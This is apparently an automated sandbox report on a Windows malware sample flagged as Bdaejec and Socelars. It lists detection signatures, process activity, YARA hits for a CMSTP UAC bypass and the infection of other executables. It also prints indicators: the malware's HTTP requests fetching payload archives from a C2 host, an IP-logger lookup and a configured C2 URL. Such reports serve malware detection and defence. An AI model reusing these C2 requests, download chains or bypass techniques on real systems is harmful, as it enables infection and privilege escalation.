Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe

Overview

General Information

Sample name:65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe
Analysis ID:1480317
MD5:7bb46178f57f6ea01347b1790d7bfa27
SHA1:bad79fb2e79f12feabd5249636537842e45b9bef
SHA256:ded8995ef3dc7ea298fa16e1733b033e06261a76e1639430d4808600884c7467
Tags:exe
Infos:

Detection

Bdaejec, Socelars
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Bdaejec
Yara detected Socelars
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has a writeable .text section
Uses known network protocols on non-standard ports
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Enables driver privileges
Enables security privileges
Entry point lies outside standard sections
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Sigma detected: Use Short Name Path in Command Line
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Yara signature match

Classification

  • System is w10x64
  • 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe (PID: 3212 cmdline: "C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe" MD5: 7BB46178F57F6EA01347B1790D7BFA27)
    • MDSxhU.exe (PID: 2876 cmdline: C:\Users\user~1\AppData\Local\Temp\MDSxhU.exe MD5: F7D21DE5C4E81341ECCD280C11DDCC9A)
      • WerFault.exe (PID: 7704 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2876 -s 1524 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 7400 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3212 -s 2052 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
{"C2 url": "https://sa-us-bucket.s3.us-east-2.amazonaws.com/jhvre24"}
SourceRuleDescriptionAuthorStrings
65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeJoeSecurity_SocelarsYara detected SocelarsJoe Security
    65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
      65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
      • 0x143f58:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
      • 0x143fa8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
      • 0x142e18:$s1: CoGetObject
      • 0x143e14:$s2: Elevation:Administrator!new:
      SourceRuleDescriptionAuthorStrings
      00000004.00000000.1333766493.0000000000C56000.00000008.00000001.01000000.00000004.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
        00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
          00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpJoeSecurity_SocelarsYara detected SocelarsJoe Security
            00000004.00000000.1333716533.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpJoeSecurity_SocelarsYara detected SocelarsJoe Security
              Process Memory Space: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe PID: 3212JoeSecurity_SocelarsYara detected SocelarsJoe Security
                Click to see the 2 entries
                SourceRuleDescriptionAuthorStrings
                4.0.65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe.b10000.0.unpackJoeSecurity_SocelarsYara detected SocelarsJoe Security
                  4.0.65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe.b10000.0.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                    4.0.65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe.b10000.0.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
                    • 0x143f58:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                    • 0x143fa8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                    • 0x142e18:$s1: CoGetObject
                    • 0x143e14:$s2: Elevation:Administrator!new:
                    4.2.65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe.b10000.0.unpackJoeSecurity_SocelarsYara detected SocelarsJoe Security
                      4.2.65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe.b10000.0.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                        Click to see the 1 entries

                        System Summary

                        barindex
                        Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: C:\Users\user~1\AppData\Local\Temp\MDSxhU.exe, CommandLine: C:\Users\user~1\AppData\Local\Temp\MDSxhU.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\MDSxhU.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\MDSxhU.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\MDSxhU.exe, ParentCommandLine: "C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe", ParentImage: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, ParentProcessId: 3212, ParentProcessName: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, ProcessCommandLine: C:\Users\user~1\AppData\Local\Temp\MDSxhU.exe, ProcessId: 2876, ProcessName: MDSxhU.exe
                        No Snort rule has matched
                        Timestamp:2024-07-24T17:32:58.302312+0200
                        SID:2838522
                        Source Port:65389
                        Destination Port:53
                        Protocol:UDP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-07-24T17:33:09.618305+0200
                        SID:2807908
                        Source Port:49706
                        Destination Port:799
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-07-24T17:33:03.941904+0200
                        SID:2807908
                        Source Port:49704
                        Destination Port:799
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-07-24T17:33:06.916379+0200
                        SID:2807908
                        Source Port:49705
                        Destination Port:799
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-07-24T17:33:00.043959+0200
                        SID:2807908
                        Source Port:49699
                        Destination Port:799
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-07-24T17:33:12.689053+0200
                        SID:2807908
                        Source Port:49708
                        Destination Port:799
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeAvira: detected
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeAvira: detected
                        Source: http://ddos.dnsnb8.net:799/cj//k4.rarUXAvira URL Cloud: Label: malware
                        Source: http://ddos.dnsnb8.net:799/cj//k5.rar86)Avira URL Cloud: Label: phishing
                        Source: http://ddos.dnsnb8.net:799/cj//k3.rarAvira URL Cloud: Label: phishing
                        Source: http://ddos.dnsnb8.net:799/cj//k3.rarXXAvira URL Cloud: Label: malware
                        Source: http://ddos.dnsnb8.net:799/cj//k2.rar(__Avira URL Cloud: Label: phishing
                        Source: http://ddos.dnsnb8.net:799/cj//k5.rarP_Avira URL Cloud: Label: phishing
                        Source: http://ddos.dnsnb8.net:799/cj//k2.rarcC:Avira URL Cloud: Label: phishing
                        Source: http://ddos.dnsnb8.net:799/cj//k1.rarAvira URL Cloud: Label: malware
                        Source: http://ddos.dnsnb8.net:799/cj//k5.rarq_Avira URL Cloud: Label: malware
                        Source: http://ddos.dnsnb8.net:799/cj//k4.rarcC:Avira URL Cloud: Label: phishing
                        Source: http://ddos.dnsnb8.net/trolAvira URL Cloud: Label: phishing
                        Source: http://ddos.dnsnb8.net:799/cj//k5.rarwAvira URL Cloud: Label: malware
                        Source: http://ddos.dnsnb8.net/Avira URL Cloud: Label: phishing
                        Source: http://ddos.dnsnb8.net:799/cj//k3.rarcC:Avira URL Cloud: Label: malware
                        Source: http://ddos.dnsnb8.net:799/cj//k3.rar8Avira URL Cloud: Label: phishing
                        Source: http://ddos.dnsnb8.net:799/cj//k4.rarfficeAvira URL Cloud: Label: phishing
                        Source: http://ddos.dnsnb8.net:799/cj//k2.rarAvira URL Cloud: Label: malware
                        Source: http://ddos.dnsnb8.net:799/cj//k1.rarq_Avira URL Cloud: Label: phishing
                        Source: http://ddos.dnsnb8.net:799/cj//k5.rar8Avira URL Cloud: Label: phishing
                        Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeAvira: detection malicious, Label: W32/Jadtre.B
                        Source: C:\Program Files\7-Zip\Uninstall.exeAvira: detection malicious, Label: W32/Jadtre.B
                        Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeAvira: detection malicious, Label: W32/Jadtre.B
                        Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exeAvira: detection malicious, Label: TR/Dldr.Small.Z.haljq
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeMalware Configuration Extractor: Socelars {"C2 url": "https://sa-us-bucket.s3.us-east-2.amazonaws.com/jhvre24"}
                        Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exeReversingLabs: Detection: 92%
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeReversingLabs: Detection: 97%
                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                        Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJoe Sandbox ML: detected
                        Source: C:\Program Files\7-Zip\Uninstall.exeJoe Sandbox ML: detected
                        Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exeJoe Sandbox ML: detected
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeJoe Sandbox ML: detected

                        Exploits

                        barindex
                        Source: Yara matchFile source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, type: SAMPLE
                        Source: Yara matchFile source: 4.0.65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe.b10000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe.b10000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000004.00000000.1333766493.0000000000C56000.00000008.00000001.01000000.00000004.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe PID: 3212, type: MEMORYSTR
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: unknownHTTPS traffic detected: 172.232.25.148:443 -> 192.168.2.7:49700 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.132.113:443 -> 192.168.2.7:49703 version: TLS 1.2
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                        Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.6.dr

                        Spreading

                        barindex
                        Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exeSystem file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exeCode function: 6_2_00AD29E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,6_2_00AD29E2
                        Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exeCode function: 6_2_00AD2B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,6_2_00AD2B8C
                        Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\Jump to behavior

                        Networking

                        barindex
                        Source: Malware configuration extractorURLs: https://sa-us-bucket.s3.us-east-2.amazonaws.com/jhvre24
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 799
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 799
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 799
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 799
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 799
                        Source: global trafficTCP traffic: 192.168.2.7:49699 -> 44.221.84.105:799
                        Source: Joe Sandbox ViewIP Address: 172.67.132.113 172.67.132.113
                        Source: Joe Sandbox ViewIP Address: 13.248.148.254 13.248.148.254
                        Source: Joe Sandbox ViewIP Address: 13.248.148.254 13.248.148.254
                        Source: Joe Sandbox ViewIP Address: 44.221.84.105 44.221.84.105
                        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                        Source: unknownDNS query: name: iplogger.org
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36Host: www.icodeps.comCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /1NpYz7 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36Host: iplogger.orgCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36Cache-Control: no-cacheHost: ww99.icodeps.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /?usid=26&utid=7334446481 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36Cache-Control: no-cacheConnection: Keep-AliveHost: ww12.icodeps.com
                        Source: global trafficHTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /cj//k3.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /cj//k4.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /cj//k5.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exeCode function: 6_2_00AD1099 wsprintfA,WinExec,lstrlen,wsprintfA,wsprintfA,URLDownloadToFileA,lstrlen,Sleep,6_2_00AD1099
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36Host: www.icodeps.comCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /1NpYz7 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36Host: iplogger.orgCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36Cache-Control: no-cacheHost: ww99.icodeps.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /?usid=26&utid=7334446481 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36Cache-Control: no-cacheConnection: Keep-AliveHost: ww12.icodeps.com
                        Source: global trafficHTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /cj//k3.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /cj//k4.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /cj//k5.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeString found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
                        Source: global trafficDNS traffic detected: DNS query: ddos.dnsnb8.net
                        Source: global trafficDNS traffic detected: DNS query: www.icodeps.com
                        Source: global trafficDNS traffic detected: DNS query: ww99.icodeps.com
                        Source: global trafficDNS traffic detected: DNS query: ww12.icodeps.com
                        Source: global trafficDNS traffic detected: DNS query: iplogger.org
                        Source: global trafficDNS traffic detected: DNS query: 15.164.165.52.in-addr.arpa
                        Source: MDSxhU.exe, 00000006.00000002.1753168092.0000000000AD3000.00000002.00000001.01000000.00000005.sdmp, MDSxhU.exe, 00000006.00000003.1336230406.0000000001340000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE
                        Source: MDSxhU.exe, 00000006.00000003.1361370867.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, MDSxhU.exe, 00000006.00000003.1361518674.00000000013AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net/
                        Source: MDSxhU.exe, 00000006.00000003.1361370867.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, MDSxhU.exe, 00000006.00000003.1361518674.00000000013AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net/trol
                        Source: MDSxhU.exe, 00000006.00000003.1487485666.00000000013FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar
                        Source: MDSxhU.exe, 00000006.00000003.1361370867.0000000001404000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar3_R
                        Source: MDSxhU.exe, 00000006.00000003.1361370867.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, MDSxhU.exe, 00000006.00000003.1487485666.00000000013C4000.00000004.00000020.00020000.00000000.sdmp, MDSxhU.exe, 00000006.00000003.1361518674.00000000013AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarcC:
                        Source: MDSxhU.exe, 00000006.00000003.1361370867.0000000001404000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarq_
                        Source: MDSxhU.exe, 00000006.00000003.1487485666.00000000013C4000.00000004.00000020.00020000.00000000.sdmp, MDSxhU.exe, 00000006.00000003.1487485666.00000000013FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rar
                        Source: MDSxhU.exe, 00000006.00000002.1753575155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, MDSxhU.exe, 00000006.00000003.1487485666.00000000013FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rar(__
                        Source: MDSxhU.exe, 00000006.00000003.1487485666.00000000013C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarcC:
                        Source: MDSxhU.exe, 00000006.00000002.1753575155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, MDSxhU.exe, 00000006.00000003.1487485666.00000000013C4000.00000004.00000020.00020000.00000000.sdmp, MDSxhU.exe, 00000006.00000003.1487485666.00000000013FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k3.rar
                        Source: MDSxhU.exe, 00000006.00000002.1753575155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, MDSxhU.exe, 00000006.00000003.1487485666.00000000013FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k3.rar%_D
                        Source: MDSxhU.exe, 00000006.00000003.1487485666.00000000013C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k3.rar8
                        Source: MDSxhU.exe, 00000006.00000002.1753575155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, MDSxhU.exe, 00000006.00000003.1487485666.00000000013FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k3.rarM_
                        Source: MDSxhU.exe, 00000006.00000002.1753575155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, MDSxhU.exe, 00000006.00000003.1487485666.00000000013FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k3.rarXX
                        Source: MDSxhU.exe, 00000006.00000003.1487485666.00000000013C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k3.rarcC:
                        Source: MDSxhU.exe, 00000006.00000002.1753575155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, MDSxhU.exe, 00000006.00000003.1487485666.00000000013FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k3.rarn_
                        Source: MDSxhU.exe, 00000006.00000003.1487485666.00000000013C4000.00000004.00000020.00020000.00000000.sdmp, MDSxhU.exe, 00000006.00000003.1487485666.00000000013FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k4.rar
                        Source: MDSxhU.exe, 00000006.00000002.1753575155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, MDSxhU.exe, 00000006.00000003.1487485666.00000000013FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k4.rarBX
